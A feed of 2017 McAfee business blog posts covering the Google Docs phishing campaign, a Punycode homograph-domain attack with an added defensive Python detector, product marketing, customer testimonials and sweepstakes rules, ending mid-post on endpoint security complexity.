https://securingtomorrow.mcafee.com/business/heads-massive-google-doc-phishing-scam-hit-scene-spreading-fast/
Wed, 03 May 2017 23:02:50 +0000

Practically everyone uses Google Docs—you can collaborate with coworkers and friends, sharing any information you want to in real time. Now, a new cyberattack has emerged in which a Google Doc phishing link is sent to a victim in the hope that they click it and infect themselves with malware. But here’s the catch—this nasty malware manages to mask itself as a sender who is a familiar face to the victim. And unfortunately, it is pretty convincing.

This phishing scam has hit Gmail inboxes everywhere today. And, leveraging a common social engineering technique, it looks exactly like an email from a friend would. Fortune published a screenshot of what the message looks like in a victim’s inbox.

So, what happens if you click on the malicious link in your inbox? First, you arrive at a login screen that looks almost identical to the same screen you’d see if someone actually invited you to a Google Doc. It lists your Google Accounts, and it even reflects Google’s recent redesign. What’s worse—the page manages to resemble a very realistic Google.com URL and clicking on the link appears to confirm the page’s legitimacy.

Then, that page invites you to choose which account you’d like to use to view the Google Doc, and you’re taken to a page that invites you to grant access to your Google Account. Basically, you’ve just given the cybercriminal launching the attack access to your entire Gmail account.

Beyond social engineering its victims, this attack’s success is dependent on a flaw in Google’s security design. The page that lists the apps with access to your Gmail account isn’t able to distinguish between apps that are made by Google and apps that aren’t.

Fortunately, Google has already responded to the incident and plugged holes. As a spokesperson stated, “We have taken action to protect users against an email spam campaign impersonating Google Docs, which affected fewer than 0.1% of Gmail users. We protected users from this attack through a combination of automatic and manual actions, including removing the fake pages and applications, and pushing updates through Safe Browsing, Gmail, and other anti-abuse systems.” Regarding the extent of damage done to that 0.1%, the spokesperson said, “While contact information was accessed and used by the campaign, our investigations show that no other data was exposed.”

Additionally, the tech giant responded to the attack by releasing a new security feature for Gmail on Android that warns users when they click on a suspicious link in an email.

So, what happens if you’re sent a questionable link from a “friend” today? The good news is this phishing email has been consistently addressed to “hhhhhhhhhhhhhh,” so clearly you can identify the attack that way. And if you do in fact receive this scam, do not click the link.

Clicking on links from your email is highly risky. McAfee chief scientist Raj Samani warns, “Phishing attacks remain the most common method of manipulating individuals into clicking on links and ultimately installing malicious content onto their systems.”

Samani suggests being aware of the emails that you’re expecting and being wary of every unexpected email. “Go straight to the source through a different communication channel if you receive a link you were not expecting. Also, hover over links to see if it is a reliable URL. Or search online for other instances of this campaign and what those instances could tell you about the email’s legitimacy.”

Then, delete suspicious emails entirely. In the case of this scam, make sure to report receiving it to Google as they’ve requested (see below).

Unfortunately, though there has been some speculation, it is yet to be determined who is responsible for this attack.

To gain further insight on how to protect yourself from phishing scams like this and to stay up-to-date on all cybersecurity news, make sure to follow @McAfee and @McAfee_Business.

MOVE Your Way: Choosing Between Agentless and Multiplatform Deployment Part 2
https://securingtomorrow.mcafee.com/business/move-your-way-choosing-between-agentless-and-multiplatform-deployment-part-2/
Mon, 01 May 2017 15:00:04 +0000

This blog post was written by Teresa Wingfield.

It’s been more than a year since we last shared some of the key differences between McAfee MOVE AntiVirus in multiplatform and agentless deployments. For a recap, please review our initial blog, MOVE Your Way: Choosing Between Agentless and Multiplatform Deployment. The list has grown over the past year.

What’s New?

Please see the table below for our most recent comparison. Multiplatform deployment now supports integration with McAfee Threat Intelligence Exchange and elastic provisioning of offline scanners. Agentless deployment protects Windows and Linux virtual machines while multiplatform deployment supports Windows.

McAfee Threat Intelligence Exchange Integration

McAfee MOVE AntiVirus leverages McAfee Threat Intelligence Exchange to share intelligence across servers and networks in multiplatform deployments. Let’s look at an example of how this capability makes server and network security work smarter together:

  1. McAfee Network Security Platform (NSP) inspects north-south & east-west traffic for network threats and discovers a file with an unknown reputation.
  2. NSP uses McAfee Advanced Threat Defense to test the file for malware in a sandbox.
  3. Advanced Threat Defense detects malware and notifies Threat Intelligence Exchange.
  4. Based on the updated Threat Intelligence Exchange reputation, McAfee MOVE AntiVirus cleans the malware from all impacted systems.

Security Virtual Machine Auto Scaling

McAfee MOVE AntiVirus uses offline scan servers called security virtual machines (SVMs) to avoid impacting the performance of virtual machines. McAfee MOVE AntiVirus auto-scales these SVMs in multiplatform deployments, meaning that SVMs can automatically be scaled up and down depending on the number of virtual machines and virtual desktops. This leads to more efficient use of resources and greater scale during antivirus scan storms.

Virtual Machine Protection

Agentless deployments protect Linux and Windows virtual machines while multiplatform deployments protect Windows virtual machines. For more details on our extensive list of supported operating systems and other requirements, please check out McAfee MOVE AntiVirus System Requirements.

Learn More

McAfee MOVE AntiVirus is sold standalone and is part of our hybrid cloud server security suites. Here’s where you can get additional information:

McAfee Server Security Suite Essentials

McAfee Server Security Suite Advanced

McAfee MOVE AntiVirus

This Tricky Phishing Scam Manages to Impersonate Legitimate URLs
https://securingtomorrow.mcafee.com/business/tricky-phishing-scam-manages-impersonate-legitimate-urls/
Thu, 27 Apr 2017 21:34:35 +0000

The post This Tricky Phishing Scam Manages to Impersonate Legitimate URLS appeared first on McAfee Blogs.

This post was written by Adam Wosotowsky.

This past week, a new web-based phishing scam emerged that sneakily impersonates legitimate URLs. You heard correctly: this cyberthreat manages to appear as a secure, trusted website, one example being apple.com. This deceptive type of attack is classified as a homograph attack, and it is extremely challenging to detect.

How We Got Here

This misdirection attack, while not new, is an excellent demonstration of the secondary problems associated with internationalization and support for a unified multi-language architecture across core internet protocols. Many core internet services operate on a strictly limited character set called ASCII, which was developed nearly 60 years ago at the birth of interconnected computers (or, in this case, automated telegraph machines). Today it is basically the set of characters available on a modern English keyboard.

Over time, programmers developed new character sets to allow users from all over the world to read and write in their native languages. This development increased access for users everywhere, but it required supporting long lists of different character sets to display each language correctly. To manage this, a single character set named Unicode was developed, which unified all character sets under one flexible standard.

The core services and protocols that run the internet, including DNS (hostname resolution) and SMTP headers (email), process ASCII content at their cores. This maintains functional backward compatibility between new protocol standards and legacy installs, and it also aids code security by limiting the scope of legitimate inputs. To bridge the gap between Unicode and ASCII, an ASCII encoding of Unicode called “Punycode” was developed. Punycode allows the full array of characters from other languages to be displayed in an email’s “From” and “Subject” headers, and allows domain names to be displayed by your browser in their intended character set, even though the domain name from the DNS perspective is plain ASCII.

How the Attack Works

The mechanism for the lookalike domain attack uses a Punycode-encoded domain containing foreign letters that look just like English letters, so that your browser renders the domain visually identical to the domain you are expecting. In the example from Xudong Zheng, this was “apple” spelled with five encoded lookalike letters, which allows the domain to look exactly like “apple.com” in the page content, in the mouseover, and in the browser window, even though the domain itself is actually https://www.xn--80ak6aa92e.com. With the addition of a trusted website certificate issued for https://www.xn--80ak6aa92e.com, someone browsing to the site would even see a valid padlock. Keep in mind that your browser knows and works with the ASCII domain name; it just shows you the translation.

The danger of this type of misdirection is obvious: a phishing email or link in a forum or social network could send unsuspecting victims to a malicious website that could attempt to steal your identity by asking for credentials or push malware through a drive-by download.

There would be little or no warning for the average user who runs a fully featured browser. What’s more, this problem is even worse on tablets or cellphones, where there is no mouseover and you just click things by touching them. It’s realistic to expect to see this technique used in the “Android security update” scam, where legitimate affiliate advertising networks are used to push apocalyptic warnings about infection unless you install this “security update”, which is what actually infects you.

Mitigating the Risk

Our advice: NEVER install an app from anywhere outside your official vendor-supplied app store. Also, much like having anti-virus and keeping it up to date, practice good security habits, such as using a web filter plugin in your browser.

Also, while this attack does seem dangerous, a few things work against it and can prevent the technique from seeing mass adoption in the wild:

  1. With the media attention, browsers are looking for a middle ground that makes users more aware of the actual ASCII domain name in addition to the Punycode-interpreted version. How this works itself into cellphone browsing, with its high cost of screen real estate, remains to be seen.
  2. This technique requires the purposeful registration of a malicious domain (as opposed to a compromised domain). There are many pro-spamming organizations that actively work against internet security by supporting anonymous domain registration, often preventing the culprit from being positively identified and prosecuted without enormous international cooperation and effort. However, there is often a pattern to purposely registered abusive domains that can be used to aggressively block them once seen. There are certainly many phishing/malware groups that rely on purposely registered domains, but many of the most effective campaigns use compromised domains, knowing they will be blocked quickly (by anti-abuse researchers) and tossed away.
  3. The domain is still a domain, and the domain reputation components of web filters and email scanners work effectively on many phishing attacks. Those tools still apply and are not hampered by odd-looking domain names.
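The following is an added example, not code from the original post or from McAfee, of the check a mail gateway or web filter can apply to every hostname it sees. It covers both the mechanism described under “How the Attack Works” and points 1 and 3 above: any label carrying the IDNA prefix “xn--” is decoded with Python’s built-in punycode codec so the ASCII form and the displayed form can be logged side by side (the middle ground browsers are looking for), then each lookalike letter is mapped to the Latin letter it resembles and the resulting “skeleton” is compared against a watch list of protected domains (a reputation-style check that is not fooled by the odd-looking ASCII name). The LOOKALIKES table and WATCH_LIST are constructed for this example and deliberately incomplete; a production deployment would use the full Unicode confusables data. The only domain taken from the post is Xudong Zheng’s xn--80ak6aa92e.com; the other hostnames in the block are constructed.

```python
import unicodedata

# Constructed, deliberately partial table of non-Latin letters that render like
# Latin letters in common fonts. A real deployment would use the full Unicode
# confusables data (UTS #39); this is only enough to illustrate the check.
LOOKALIKES = {
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
    "\u0443": "y",  # CYRILLIC SMALL LETTER U
    "\u0445": "x",  # CYRILLIC SMALL LETTER HA
    "\u0455": "s",  # CYRILLIC SMALL LETTER DZE
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    "\u0458": "j",  # CYRILLIC SMALL LETTER JE
    "\u04cf": "l",  # CYRILLIC SMALL LETTER PALOCHKA
    "\u03b1": "a",  # GREEK SMALL LETTER ALPHA
    "\u03bf": "o",  # GREEK SMALL LETTER OMICRON
}

# Constructed watch list of domains the organisation wants protected from lookalikes.
WATCH_LIST = {"apple.com", "paypal.com"}


def decode_label(label):
    """Return the string a browser would display for one DNS label.

    Labels carrying the IDNA ACE prefix 'xn--' are Punycode (RFC 3492) and are
    decoded with Python's built-in 'punycode' codec; other labels are unchanged.
    """
    if label.startswith("xn--"):
        return label[4:].encode("ascii").decode("punycode")
    return label


def scripts_in(label):
    """Rough per-label script set derived from Unicode character names.

    ASCII letters count as LATIN; digits and hyphens are ignored; any other
    character contributes the first word of its Unicode name ('CYRILLIC', 'GREEK').
    """
    scripts = set()
    for ch in label:
        if ch.isascii():
            if ch.isalpha():
                scripts.add("LATIN")
        else:
            scripts.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return scripts


def skeleton(text):
    """Replace each known lookalike with the Latin letter it resembles."""
    return "".join(LOOKALIKES.get(ch, ch) for ch in text)


def analyze_hostname(hostname):
    """Classify a hostname as seen in a URL, a mail header or a DNS log.

    Verdicts: 'ascii' (no IDN labels), 'homograph' (skeleton matches a
    watch-listed domain but the real name differs), 'mixed-script' (one label
    mixes scripts), 'idn' (internationalized, nothing suspicious found here),
    'invalid' (an xn-- label that does not decode).
    """
    host = hostname.lower()
    labels = host.split(".")
    try:
        decoded_labels = [decode_label(l) for l in labels]
    except UnicodeError:
        return {"ascii": host, "decoded": None, "skeleton": None, "verdict": "invalid"}

    decoded = ".".join(decoded_labels)
    skel = skeleton(decoded)
    result = {"ascii": host, "decoded": decoded, "skeleton": skel}

    if decoded == host and host.isascii():
        result["verdict"] = "ascii"
    elif skel in WATCH_LIST and skel != decoded:
        result["verdict"] = "homograph"
        result["impersonates"] = skel
    elif any(len(scripts_in(l)) > 1 for l in decoded_labels):
        result["verdict"] = "mixed-script"
    else:
        result["verdict"] = "idn"
    return result


if __name__ == "__main__":
    # xn--80ak6aa92e.com is the domain from Xudong Zheng's demonstration; the rest are constructed.
    for host in ("apple.com", "xn--80ak6aa92e.com", "xn--mnchen-3ya.de", "\u0430bcd.com"):
        r = analyze_hostname(host)
        print(f"{host:22} -> shown as {r['decoded']!r:16} verdict={r['verdict']}")
```

The skeleton comparison is the part worth keeping: the decoded name “аррӏе.com” never has to be matched byte for byte, only its Latin-looking shape, so one watch-list entry covers every lookalike spelling the table knows about. The München example shows the other side of the rule: a legitimate IDN in a single script that maps to nothing on the watch list is reported as plain “idn”, not blocked.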

Make sure you stay up-to-date on all cybersecurity news by following @McAfee or @McAfee_Business.

Why Migrate to McAfee ENS?
https://securingtomorrow.mcafee.com/business/migrate-mcafee-ens/
Thu, 27 Apr 2017 14:00:05 +0000

The post Why Migrate to McAfee ENS? appeared first on McAfee Blogs.

What are you waiting for? If you haven’t already made plans to migrate to McAfee Endpoint Security (ENS) soon, you should. But don’t just take our word for it.

See what other McAfee customers say below about why they migrated their endpoint protection to McAfee ENS and what types of benefits they are experiencing. Their main reasons for migrating vary but generally fall into four categories: better performance and user experience, easier management and administrative time savings, improved threat protection, and better positioning for the future.

Better Performance and User Experience

“When we started deploying [McAfee] ENS to our customers, the calls on our scan day stopped…The customer experience, which is really our end game, has just been dramatically improved. We can take problematic users or users that have impacts from the old legacy scans and each one of them comes out [of the migration to ENS] with a positive comment and a positive experience.”

– Chris T., Security Engineer, Large Insurance Company

“[McAfee ENS] has improved the computing experience of our end users. [It] takes less resources to run and is less interfering with normal business operations …we are very happy with it.”

–  Harry Folloder, Chief Information Officer, Advantage Waypoint

“[Why did we migrate?] Primarily performance. [McAfee] Endpoint 10 has been heavily marketed as being a lot faster… Our testing definitely validated that it was a lot faster.”

–  Dwayne Cyr, Senior Cyber Security Manager, Textron

“My phone used to ring off the hook on Tuesdays [full scan day] and now it doesn’t.”

–  Mehdi Harandi, Desktop Security Manager, Fairfax County Public Schools

Easier Management and Administrative Time Savings

“There were quite a few instances in our environment of ransomware that no longer exist. I’d say that’s easily 40 hours [saved] every two weeks.”

–  Edwin Drayden, Director of IT Infrastructure, HollyFrontier

“What I love about McAfee is the protect-detect-correct strategy… [That strategy] works out smoothly in the latest version [10.5] of McAfee Endpoint Security. …Within three clicks, you can find the [infected] system, investigate the system, and respond. [McAfee ENS] saves a lot of administrative time.”

–  Niels Benders, Infrastructure Architect, CGI

“What I like best about McAfee ENS so far is that it is both stronger and lighter. By that I mean it has superior detection and prevention technology that protects us better against present and future threats, but it is also easier to manage. Both aspects are equally important.”

–  Philippe Maquoi, Head of Endpoint and Server Security, Service Public de Wallonie

“We were just blown away by the intricate detail of the user experience, from the end user computing side but also from the admin side. [McAfee ENS is] making it easier for us to manage the endpoint and take corrective action.”

–  Harry Folloder, Chief Information Officer, Advantage Waypoint

“[McAfee] ENS represented a consolidated footprint, made our management much easier to control… The overall performance by consolidating the tools has been rather dramatic.”

–  Chris T., Security Engineer, Large Insurance Company

“…But with McAfee Endpoint Security, I was able to find exactly which module was causing the issue, temporarily disable just that module, and find the conflict within less than one hour. In the past, finding such a conflict could easily have taken eight to 20 hours. … With McAfee Endpoint Security, I set it up once and then can forget about it 99 percent of the time…Management doesn’t have to hear about endpoint security at all.”

–  Mehdi Harandi, Desktop Security Manager, Fairfax County Public Schools

“The modular software blade design…As an administrator, that’s very useful. [It] adds a lot of flexibility. The technology behind [McAfee ENS] is very solid.”

–  Scott M., Security Engineer, Large Healthcare Company

Improved Threat Protection

“McAfee ENS is smart enough to stop threats without us having to manually create a bunch of rules, as we had to do in the past. Also, instead of having to push out and update multiple agents for various aspects of protection—a HIPS agent, a web content control agent, and so on—booting and rebooting each time, with ENS we have a stronger tool set, encompassed in one product, with just one agent to deal with.”

–  Philippe Maquoi, Head of Endpoint and Server Security, Service Public de Wallonie

“We looked at all the features and benefits [of McAfee ENS]. My staff feels more comfortable with the security that it provides their teams and those we are charged with protecting.”

–  Harry Folloder, Chief Information Officer, Advantage Waypoint

“[We migrated] to get a quality product and watch it attach upstream to everything else… [Once deployed] I felt better; I could sleep at night, because I knew that [McAfee] ENS works… It’s been pretty quiet ever since, [across] literally every single endpoint in the whole infrastructure.”

–  Edwin Drayden, Director of IT Infrastructure, HollyFrontier

“We haven’t had a CryptoLocker outbreak in six months. With McAfee Endpoint Security, we have more visibility, more coverage, and more customer confidence than we have had in 12 years.”

–  Simon Sigré, Senior Network Engineer, Catholic Education South Australia

Better Positioning for the Future

“McAfee Endpoint Security is, to use an overused but apt term, ‘state of the art.’ It represents the next evolution of endpoint protection. It’s more stable, more efficient, and more accurate. It is definitely worth migrating to.”

–  Chris T., Security Engineer, Large Insurance Company

“With McAfee Endpoint Security, we now have endpoint protection that positions us well for the future.”

–  Mehdi Harandi, Desktop Security Manager, Fairfax County Public Schools

“[McAfee] ENS 10.5 looks like it is going to be amazing. It reflects a long-term vision of how to address endpoint protection.”

–  Scott M., Large Healthcare Company

Watch below to see and hear firsthand from McAfee customers why they migrated to McAfee ENS.

Get your questions answered by tweeting @McAfee_Business.

Take the Misaligned #IncentiveQuiz and Win BIG
https://securingtomorrow.mcafee.com/business/take-misaligned-incentivequiz-win-big/
Wed, 26 Apr 2017 22:22:09 +0000

The post Take the Misaligned #IncentiveQuiz and Win BIG appeared first on McAfee Blogs.

Between the infamous ‘Black Hats’ and crusading ‘White Hats,’ fighting cybercrime can feel like a game of cat and mouse. These days, Black Hats always appear one step ahead of the do-gooder White Hats. It’s a never-ending back and forth. But what makes each side tick? Test your knowledge of Black and White Hat incentives with our latest #IncentiveQuiz. Learn for yourself what drives Black Hats to crime, and see what White Hat incentives lack.

Need an incentive?

To ensure we practice what we preach, make sure to share your results via Twitter for your chance to win a $50 Amazon Gift Card! Details below, terms apply. And don’t forget to read the Misaligned Incentives report. You can download it here.

Share your results on Twitter, by tagging @McAfee and using #IncentiveQuiz and #sweepstakes for your chance to win a $50 Amazon Gift card. Terms and conditions apply.

Test Your Knowledge with the Misaligned #IncentiveQuiz Sweepstakes! Terms & Conditions
https://securingtomorrow.mcafee.com/business/test-your-knowledge-with-the-misaligned-incentivequiz-sweepstakes-terms-conditions/
Wed, 26 Apr 2017 17:00:39 +0000

The post Test Your Knowledge with the Misaligned #IncentiveQuiz Sweepstakes! Terms & Conditions appeared first on McAfee Blogs.

Test Your Knowledge with the Misaligned #IncentiveQuiz Sweepstakes! And enter for the chance to Win a $50 Amazon Gift Card by sharing your results!

Think you know the difference between the infamous ‘Black Hats’ and crusading ‘White Hats?’ Well, the Misaligned Incentives Report is out and we want to test your knowledge! Find out by taking our Misaligned Incentive Quiz and share your results on social media, where you’ll be entered into a drawing for a $50 Amazon gift card!

How to Win:

After you read the Misaligned Incentive report, test your knowledge with our Misaligned #IncentiveQuiz Sweepstakes! Once completed, share your results on Twitter and tag @McAfee, #IncentiveQuiz and #Sweepstakes for a chance at a $50 Amazon Gift card. Four total winners will be selected. One on Monday, May 1st and one on Monday, May 8th. Winners will be posted on Twitter and notified by direct message. Make sure you follow @McAfee and @McAfee_Business to see who won!

For full Sweepstakes details, please see the Terms and Conditions below:

McAfee Misaligned #IncentiveQuiz Sweepstakes Terms and Conditions

1. How to enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee’s Misaligned #IncentiveQuiz Sweepstakes will be conducted for two weeks, each week being the start of a new entry period. All entries for each day of the McAfee Misaligned #IncentiveQuiz Sweepstakes must be received during the time allotted for the Misaligned #IncentiveQuiz Sweepstakes. Pacific Daylight Time shall control the McAfee Misaligned #IncentiveQuiz Sweepstakes. One winner will be chosen for each of the five days of the McAfee Misaligned #IncentiveQuiz Sweepstakes. The McAfee Misaligned #IncentiveQuiz Sweepstakes duration is as follows:

McAfee Misaligned #IncentiveQuiz Sweepstakes:

  • Wednesday April 26th  – Friday, April 28th
    • Two winners announced Monday, May 1st, 12:00pm PST
  • Monday, May 1st – Friday, May 5th
    • Two winners announced: Monday, May 8th, 12:00pm PST

For the McAfee Misaligned #IncentiveQuiz Sweepstakes, participants must complete the following steps during the time allotted for the McAfee Misaligned #IncentiveQuiz Sweepstakes:

  1. Take the Misaligned #IncentiveQuiz on the McAfee “Securing Tomorrow” website
  2. You must share your quiz results on Twitter and tag @McAfee and #IncentiveQuiz and #Sweepstakes

One winner will be chosen for each week of the McAfee Misaligned #IncentiveQuiz Sweepstakes from the viable pool of entries that shared their quiz results and included @McAfee, #IncentiveQuiz and #Sweepstakes. McAfee and the McAfee social team will choose the winner from all the viable entries. The winner of each week will be announced by 12:00pm PDT the following Monday on the @McAfee_Business or @McAfee Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes. Participants are only eligible to win one day of the 2 weeks.

2. Eligibility: 

McAfee Misaligned #IncentiveQuiz Sweepstakes is open to all legal residents of the 50 United States or District of Columbia who are 18 years of age or older on the date the McAfee Misaligned #IncentiveQuiz Sweepstakes begins and live in a jurisdiction where this prize and McAfee Misaligned #IncentiveQuiz Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

3. Winner Selection:

Winners will be selected from the eligible entries received during each of the McAfee Misaligned #IncentiveQuiz Sweepstakes periods. Sponsor will select the names of [4] potential winners of the prizes in a random drawing from among all eligible Submissions at the address listed below. The odds of winning depend on the number of eligible entries received. Entrants will only be eligible to win one of the weeks. By participating, entrants agree to be bound by the Official McAfee Misaligned #IncentiveQuiz Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

Winner Notification: Each winner will be notified via direct message (“DM”) on Twitter.com by 12:00pm PDT on each of the days listed above. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

4. Prizes: 

The prize for each McAfee Misaligned #IncentiveQuiz Sweepstakes is a $50 Amazon e-gift card (approximate retail value “ARV” of the prize is $50 USD).

Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Misaligned #IncentiveQuiz Sweepstakes and all matters or disputes arising from the McAfee Misaligned #IncentiveQuiz Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.
Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

5. General conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner.

Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Misaligned #IncentiveQuiz Sweepstakes, or by any technical or human error, which may occur in the processing of the McAfee Misaligned #IncentiveQuiz Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee Misaligned #IncentiveQuiz Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee Misaligned #IncentiveQuiz Sweepstakes-related activity, or participation in the McAfee Misaligned #IncentiveQuiz Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

Limitations of Liability; Releases: By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE SPONSOR OR THE RELEASED PARTIES BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOSS OF USE, LOSS OF PROFITS OR LOSS OF DATA, WHETHER IN AN ACTION IN CONTRACT, TORT (INCLUDING, NEGLIGENCE) OR OTHERWISE, ARISING OUT OF OR IN ANY WAY CONNECTED TO YOUR PARTICIPATION IN THE SWEEPSTAKES OR USE OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE SWEEPSTAKES OR ANY PRIZE, EVEN IF A RELEASED PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

  1. TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE AGGREGATE LIABILITY OF THE RELEASED PARTIES (JOINTLY) ARISING OUT OF OR RELATING TO YOUR PARTICIPATION IN THE SWEEPSTAKES OR USE OF OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE SWEEPSTAKES OR ANY PRIZE EXCEED $10. THE LIMITATIONS SET FORTH IN THIS SECTION WILL NOT EXCLUDE OR LIMIT LIABILITY FOR PERSONAL INJURY OR PROPERTY DAMAGE CAUSED BY PRODUCTS RENTED FROM THE SPONSOR, OR FOR THE RELEASED PARTIES’ GROSS NEGLIGENCE, INTENTIONAL MISCONDUCT, OR FOR FRAUD.
  2. Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list). As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

Prize Forfeiture: If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize McAfee Misaligned #IncentiveQuiz Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each McAfee Misaligned #IncentiveQuiz Sweepstakes.

Dispute Resolution:  Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Misaligned #IncentiveQuiz Sweepstakes and all matters or disputes arising from the McAfee Misaligned #IncentiveQuiz Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Governing Law & Disputes: EACH ENTRANT AGREES THAT ANY DISPUTES, CLAIMS, AND CAUSES OF ACTION ARISING OUT OF OR CONNECTED WITH THIS SWEEPSTAKES OR ANY PRIZE AWARDED WILL BE RESOLVED INDIVIDUALLY, WITHOUT RESORT TO ANY FORM OF CLASS ACTION and these rules will be construed in accordance with the laws, jurisdiction, and venue of Delaware.

Privacy Policy: Personal information obtained in connection with this prize McAfee Misaligned #IncentiveQuiz Sweepstakes will be handled in accordance with the policy set forth at http://www.mcafee.com/us/about/privacy.html

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after May 8th 2017 and before May 7th 2018 to the address listed below, Attn: Misaligned Incentives Quiz Sweepstakes. To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed below, Attn: Margie Easter. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2017 by McAfee, LLC. All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters, 2821 Mission College Blvd., Santa Clara, CA 95054 USA

Are You Getting Buried by the Endpoint Security Snowball Effect?
https://securingtomorrow.mcafee.com/business/endpoint-security/snowball-effect/
Tue, 25 Apr 2017 19:00:01 +0000

The post Are You Getting Buried by the Endpoint Security Snowball Effect? appeared first on McAfee Blogs.

This blog was written by Joakim Lialias.

It starts out innocently enough: there’s a dangerous emerging threat to endpoints that can sneak past current defenses. A new startup has just the solution to stop it. Sure, you’re not thrilled about adding another agent and interface to your already overtaxed security team’s portfolio, but it’s just this one small addition, and it really does provide important protection.

Fast forward to a year later, and there’s another new threat. Now, you’re looking at another new endpoint product, with yet another new agent and interface. Six months later, it happens again. And again. All of a sudden, your security teams are managing a dozen different agents across your environment. They’re struggling just to keep their heads above water. And because there’s so much complexity, it now takes even longer to detect and respond to threats.

You’ve just been hit by the “endpoint security snowball effect.” And you’re not alone.

Proliferating Complexity

According to a recent Forrester survey commissioned by McAfee, the average organization is now monitoring 10 different endpoint security agents. When they need to investigate and remediate a new threat, those times when literally every second matters, they’re swiveling between an average of five different interfaces.

How did we get here? A number of industry and organizational trends converged to create the current predicament, including:

  • Silver bullet startups: The last several years have witnessed an explosion of new endpoint security products hitting the market. Many are very innovative. The problem is that none of them have command over the full security architecture. They’re designed to solve niche problems, making them hard to integrate into an overarching, automated security framework.
  • Conglomerate growth through acquisition: There are a few comprehensive security players in the market, but most have grown through acquisition, not by innovating their own products. Their endpoint tools may all have the same logo, but the products themselves remain distinct in their development and the engineering resources they require.
  • Diverse buying centers within organizations: Many organizations have experienced their own rapid growth, both geographically and through acquisitions. The result is that there may be several different buying centers in an organization for endpoint security, with different people making purchasing decisions to meet specific needs.

It hasn’t helped that, for years, the accepted best practice for endpoint security was to layer multiple “best-of-breed” solutions. As many organizations are now seeing firsthand, that approach quickly snowballs—and eventually becomes an avalanche—creating more complexity than any security team can keep up with.

These days, more organizations—over 50 percent according to the Forrester survey—are turning back to single-vendor solutions. They’re prioritizing endpoint solutions that can do more things, more efficiently, with better accuracy and less complexity.

Envisioning a Better Solution

Fortunately, this is not the first time that CISOs have seen this problem. A decade ago, organizations were similarly buried in disparate tools and processes for the basic IT architecture.

In response, the industry moved toward the concept of the “service-oriented architecture” (SOA), sometimes called the enterprise service bus. The idea was to create a single, common framework that everything could plug into, where disparate solutions could communicate, and IT could move away from constant manual integration.

So the model already exists. Now, we need to apply it to endpoint security. What should that look like?

